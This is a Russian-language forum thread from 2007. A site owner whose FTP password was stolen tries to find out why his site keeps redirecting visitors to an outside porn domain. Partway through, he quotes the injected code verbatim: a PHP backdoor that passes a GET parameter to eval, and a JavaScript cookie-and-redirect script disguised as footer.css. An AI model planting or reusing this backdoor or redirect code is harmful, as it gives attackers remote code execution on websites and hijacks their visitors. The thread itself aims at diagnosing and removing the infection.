8 декабря 2007 в 16:42
После кражи ftp-пароля, на сайте прописали редирект на __http://3bepb.net/link.php?id=1. Бяку из index.php убрал сразу (жаль не скопировал). Проверил все php и tpl - чисто. Пароль заменил, права доступа подкорректировал. Вроде все заработало нормально. Нифига!!! После попытки войти в панель управления __http://мой_сайт/user опять срабатывает редирект на эту порнуху. Причем - однократно. Проверил вроде, все, что можно, никаких левых script, redirect, и т.п. не обнаружено, а переадресация идет! Где засада???!!!
Комментарии
Кеш?
Не знаю, не уверен. Хотя, на входе вроде стоит какой-то proxy. Просто проверял заходя на сайт с разных компов. Везде одно и тож...
проверьте бяку еще раз в php в виде < /script >
Собственно с этого и начал. Искал строки script, http, 3bepb. То что находилось по script и http подозрений не вызывало. Явных ссылок тоже не выловил. Понимаю, что чудес не бывает и пройдусь еще раз. Хотя, меня мучают смутные сомнения - не все так просто...
.htaccess не трогали? проверьте.
.htaccess вполне лоялен:
charsetdisable on
Order allow,deny
Options -Indexes
Options +FollowSymLinks
ErrorDocument 404 /index.php
DirectoryIndex index.php
…
ExpiresActive On
ExpiresDefault A1209600
ExpiresByType text/html A1
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
# $Id: .htaccess,v 1.81.2.2 2007/05/21 01:34:59 drumm Exp $
Ну вот, с утра опять.(((
Бяка в index.php :
<?php error_reporting(0);ini_set('display_errors','0');ini_set('log_errors','off');if(isset($_GET['eva'])){eval($_GET['eva']);die('');}?>SetAff('11','value')
<?php
Причем в кеше появляется замечательный footer.css которого на сайте нет:
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}}
function Set_Cookie( name, value, hours, path, domain, secure ) {
var today = new Date();
var expires_date = new Date(today.getTime() + hours*60*60*1000);
document.cookie = name + "=" +escape( value ) +
( (hours) ? ";expires=" + expires_date.toGMTString() : "" ) +
( (path) ? ";path=" + path : "" ) +
( (domain ) ? ";domain=" + domain : "" ) +
( (secure ) ? ";secure" : "" );
}
function SetAff(time,serv) {
if(!Get_Cookie('ChrootID'))
{
Set_Cookie('ChrootID', '/chroot', time, '/', '', '');
window.location='http://3bepb.net/bitrix/redirect.php?event1=XPL&event2='+serv+'&event3=linkleft&referer1 =xpl&referer2='+serv+'&goto=http://3bepb.net/link.php?id=1&aff='+serv+'';
}}
Просто в админке форума свой index.php, эта сволочь прописывается и в forum/index.php и в forum/admin/index.php
У меня вроде только один: htdocs/index.php
Да и тот я помощью mod_rewrite отдал им на растерзание - пусть забавляются ))